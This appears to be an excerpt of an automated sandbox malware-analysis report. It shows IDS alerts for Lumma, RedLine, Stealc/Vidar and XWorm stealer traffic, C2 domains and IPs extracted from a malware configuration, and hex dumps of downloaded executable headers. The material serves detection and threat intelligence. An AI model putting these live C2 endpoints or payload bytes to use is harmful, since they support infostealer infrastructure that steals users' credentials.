Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50252 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.6:50233 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:50233 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.6:50233
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:50233 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.6:50233
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:50233 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.6:50234 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49932 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49932 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49899 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50001 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50001 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49939 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49939 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49891 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50024 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50010 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50010 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50028 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49898 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49898 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50035 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:49938 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50066 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50066 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50064 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50064 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50065 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50054 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50054 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50061 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50061 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50075 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50075 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:49947 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50067 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50104 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.214.119:443 -> 192.168.2.6:49914
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50049 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50049 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50077 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50078 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50078 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49892 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49892 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50145 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50145 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50151 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50151 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.214.119:443 -> 192.168.2.6:49926
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50142 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50188 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50188 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50183 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50191 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50191 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50197 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50195 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50195 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50177 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50177 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50196 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50203 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50203 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50091 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50201 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50063 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:50063 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50189 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50189 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50057 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50199 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50199 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50224 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50231 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50231 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50237 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50245 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50252 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50232 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50232 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50257 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50221 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.214.119:443 -> 192.168.2.6:50256
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50258 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.6:50182 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.6:50182 -> 5.75.214.119:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.214.119:443 -> 192.168.2.6:50255

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: 95.216.115.242
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199824159981
Source: Malware configuration extractor	IPs: 185.215.113.43

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: G8lVmiI.exe.7.dr
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: G8lVmiI.exe0.7.dr

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.6:50068 -> 95.216.115.242:33333
Source: global traffic	TCP traffic: 192.168.2.6:50233 -> 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:09 GMTContent-Type: application/octet-streamContent-Length: 1764352Last-Modified: Fri, 07 Feb 2025 10:42:01 GMTConnection: keep-aliveETag: "67a5e379-1aec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 15 88 a0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 7e 01 00 00 64 00 00 00 00 00 00 00 b0 45 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 da 99 1b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 91 45 00 57 00 00 00 55 10 02 00 69 00 00 00 00 00 02 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 01 00 00 10 00 00 00 d8 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 0c 04 00 00 00 00 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 02 00 00 02 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 20 02 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 66 72 71 61 62 68 6b 00 e0 19 00 00 c0 2b 00 00 d6 19 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 73 6c 64 6b 62 7a 00 10 00 00 00 a0 45 00 00 04 00 00 00 c6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 45 00 00 22 00 00 00 ca 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:14 GMTContent-Type: application/octet-streamContent-Length: 814592Last-Modified: Thu, 06 Feb 2025 20:53:42 GMTConnection: keep-aliveETag: "67a52156-c6e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 a0 02 00 00 10 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 c0 07 00 00 10 05 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:19 GMTContent-Type: application/octet-streamContent-Length: 814592Last-Modified: Thu, 06 Feb 2025 21:16:33 GMTConnection: keep-aliveETag: "67a526b1-c6e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 a0 02 00 00 10 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 c0 07 00 00 10 05 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
